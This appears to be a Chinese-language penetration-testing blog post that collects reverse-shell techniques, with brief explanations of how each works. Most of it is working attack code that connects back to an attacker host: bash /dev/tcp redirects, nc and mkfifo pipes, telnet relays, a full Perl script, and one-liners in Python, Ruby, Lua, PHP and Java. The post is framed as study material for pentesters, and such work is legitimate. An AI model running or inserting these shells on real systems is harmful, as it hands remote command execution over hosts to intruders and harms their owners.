天天被ven师傅吐槽不会日站,然后又看着乐师傅日站,感觉自己好他妈菜,也是时候补一波渗透测试里的一些东西了,虽然我也知道是炒冷饭,但是还是要持续更新,收录一些反弹shell的常规套路和奇淫巧技。当然知其然知其所以然,也会有一些对于相关命令的解析,方便每个渗透测试工作者可以很好的利用,而不是当成exp一样去打
bash
在各种各样的文章里最最常见的一种,但是需要注意的是,往往在一些渗透测试中并不适用,具体原因涉及到linux发行版之间的差异。(ubuntu 不能用bash 反弹233)
1
bash -i >& /dev/tcp/x.x.x.x/port 0&>1
- bash 不解释
-i代表交互运行bash>重定向到 /dev/tcp/x.x.x.x/port&后台运行,如果不加就会造成服务器端只发送一个tcp连接,然后什么都没了/dev/tcp/x.x.x.x/port找不到此文件的哈,意为调用socket,建立socket连接标准输入1标准输出0>&1标准输入重定向到标准输出,实现你与反弹出来的shell的交互
2
exec 5<>/dev/tcp/x.x.x.x/9999
cat <&5 | while read line; do $line 2>&5 >&5; done
- 第一条命令 建立与
x.x.x.x:9999的tcp连接,并将标准输入输出作为device5的标准输入输出 - 第二条
cat <&5获取device5的输入;
while read line; do $line 2>&5 >&5一旦获取到命令便运行 然后将标准输入输出以及标准错误输出到device5中
3
exec 0&0 2>&0
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
/bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1
notice
关闭设备 用 exec [num]>&-
nc反弹
1
出现第二多的233,但是很容易遇到服务器没装netcat或者装了但是webshell不具有权限,又或者默认的发行版的netcat不带-e参数
nc -e /bin/bash x.x.x.x port
在netcat 参数缺失的时候还有以下三种解决方案
2
rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc x.x.x.x 9999 >/tmp/f
rm /tmp/f;不解释mkfifo /tmp/f;在tmp目录下写fifo文件f/bin/sh -i 2>&1将/bin/sh 的标准错误重定向到标准输出nc x.x.x.x 2333 >/tmp/f将nc监听到的输入 输入到fifo
notice
应该是先获得输入和输出然后将运行结果通过管道到nc客户端
3
nc x.x.x.x 9999|/bin/bash|nc x.x.x.x 8888
这个就比较简单,从9999端口获取到命令,bash 运行后 将结果返回 8888
telnet
telnet x.x.x.x 9999 | /bin/bash | telnet x.x.x.x 8888
监听两个端口分别输入和输出
Perl
perl 没学过但是看见了还是要放
1
perl -e 'use Socket;$i="[x.x.x.x]";$p=[port];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2
#!/usr/bin/perl -w
use strict;
use Socket;
use IO::Handle;
if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port n";
exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.n";
system($shell);
close SOCK;
exit 0;
Usage:./script.pl [ip] [port]
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
python黑帽子中有更加详细的2333
不过一般来说够用了
Ruby
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("x.x.x.x","9999");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Lua
lua -e "require('socket');require('os');t=socket.tcp();t:connect('x.x.x.x','9999');os.execute('/bin/sh -i <&3 >&3 2>&3');"
PHP
php -r '$sock=fsockopen("x.x.x.x",9999);exec("/bin/bash -i <&3 >&3 2>&3");'
Java
public class Revs {
/**
* @param args
* @throws Exception
*/
public static void main(String[] args) throws Exception {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/x.x.x.x/9999;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}
总结[2017.7.14更]
基本都是本来就有的资源,慢慢更
bash/nc/telnet 三个都是基于工具原有的功能来实现反弹的
java说白了就是调用了系统函数,可定制性强2333
几个脚本语言,就是调用socket,原理理解一下很快,感觉在反弹上和webshell一样具有很强的定制性